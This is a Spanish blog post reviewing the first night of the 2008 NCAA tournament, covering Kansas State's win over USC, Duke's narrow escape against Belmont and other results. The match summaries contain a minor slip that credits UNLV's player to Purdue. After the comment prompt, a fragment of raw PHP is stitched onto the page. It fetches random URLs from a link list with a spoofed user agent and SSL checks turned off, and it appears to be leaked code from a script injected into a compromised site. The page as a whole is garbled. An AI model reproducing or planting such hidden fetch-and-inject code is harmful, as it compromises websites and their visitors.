Primera noche: no hubo sorpresas y Beasley venció a OJ Mayo

21 de March de 2008 por RusticoColorao

Pues sí, cuando sólo dos equipos con peor posición en el bracket (Kansas State (11) y Texas A&M (9)) consiguen vencer a equipos con números más altos (USC (6) y BYU (8) respectivamente), y encima ninguna de las victorias causa extrañeza, o cuando la mayoría de partidos se deciden por más de 10 puntos se puede decir que no hubo sorpresas y que la noche fue… ¿aburrida?

Podríamos intentar rebatir esta teoría diciendo que una noche en la que se enfrentan dos jugadores con la pinta que tienen Beasley y Mayo, en la que la cenicienta Belmont casi le gana a la gran Duke del Coach K o en la que se tuerce nuestra teoría de los jugones (Bayless & Budinger), no puede catalogarse como aburrida. Pero después de pasar cerca de 12 horas viendo NCAA y tras haber dormido muy poco no encontramos las fuerzas suficientes como para rebatir esto, así que pongamos los resultados de la noche.

El partido de la jornada

(6) USC 67 vs (11) Kansas State 80

O lo que es igual, Beasley (23 puntos y 11 rebotes) le ganó a Mayo (20 puntos y 5 asistencias). El partido no respondió a las expectativas pero tuvo momentos muy emocionantes. Hubo dos claves que decantaron la victoria para los de KSU: la diferencia en el rebote, 40 rebotes (18 ofensivos) para los de Kansas por sólo 27 (9) para los de USC, y la aparición que os comentamos del pescador que se aprovechase del río revuelto, Bill Walker (22 puntos y 3 triples), ya que Jefferson (15 puntos y 6 rebotes) tuvo problemas de personales y poco ayudó a Mayo. Beasley sale muy reforzado, mientras que Mayo ha confirmado las dudas que había generado durante la temporada, desaparecido a ratos, impreciso en ocasiones. ¿Se quedará otro año en USC? Yo creo que sí.


Las casi sorpresas

(2) Duke 71 vs (15) Belmont 70

¿Caerán los Blue Devils ante una cenicienta como el año pasado? Esta era la pregunta que hacíamos ayer… y casi salta la sorpresa. Sólo una canasta coast to coast de Henderson (21 puntos y 7 rebotes) cuando quedaban pocos segundos para el final salvó al equipo del Coach K.

(7) West Virginia 75 vs (10) Arizona 65

¿Volverá a decepcionar Arizona? Pues sí, volvió a hacerlo. Budinger (23 puntos y 5 rebotes) y Bayless (decepcionantes 11 puntos y 3 asistencias) confirmaron que Arizona no juega a nada, y que basta ser un equipo para ganarles. West Virginia con un correcto Joe Alexander (14 puntos y 8 rebotes) y dos tiradores entonados (entre Ruoff y Nichols consiguieron un 9 de 14 en triples) ganó el partido de forma más o menos cómoda.

(3) Xavier 73 vs (14) Georgia 61

Georgia no siguió con su racha triunfadora y no pudo eliminar a la favorita Xavier. Aunque fueron ganando hasta los últimos minutos, el cansancio físico o la presión les hicieron mella ante una Xavier donde Josh Duncan destacó (20 puntos y 8 rebotes).

El resto de la noche

(1) Kansas 85 vs (16) Portland State 61

Kansas dominó el partido sin problemas.

(5) Michigan State 72 vs (12) Temple 61

Lástima la eliminación de la Temple del español Sergio Olmos (6 puntos y 1 rebote), pero Michigan State es mucho más equipo.

(6) Marquette 74 vs (11) Kentucky 66

Uno de los partidos más disputados. Los 35 puntos y 5 triples de Crawford no bastaron para evitar la derrota de los Wildcats.

(6) Purdue 90 vs (11) Baylor 79

Purdue se repuso de su racha perdedora y ganó a Baylor con casi un 50% en triples.

(8) UNLV 71 vs (9) Kent State 58

Wink Adams, con 17 puntos, 6 rebotes y 5 asistencias, lideró a Purdue.

(4) Pittsburgh 82 vs (13) Oral Roberts 63

Los Panthers de Pittsburgh están a llamados a cotas más altas.

(3) Stanford 77 vs (14) Cornell 53

Stanford ganó con los suplentes y con el bueno de los gemelos López sin casi jugar.

(4) Washington State 71 vs (13) Winthrop 40

La defensa de Washington State les llevó a la victoria.

(8) BYU 62 vs (9) Texas A&M 67

No hubo duelo interior entre Plaisted y DeAndre Jordan, pero los 26 puntos (6 triples) de Josh Carter les dio la victoria a los Aggies.

(3) Wisconsin 71 vs (14) Cal St. Fullerton 56

Sufrieron algo más de lo esperado los de Wisconsin.

(5) Notre Dame 68 vs George Mason 50

Pues no, no van a ser la sorpresa de la competición los Patriots. Harangody con 18 puntos y 14 rebotes destacó en Notre Dame.

(1) UCLA 70 vs (16) Miss.Valley State 29

¿Qué se puede decir ante 29 puntos anotados? Love, 20 puntos y 9 rebotes, destacando desde la primera ronda.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>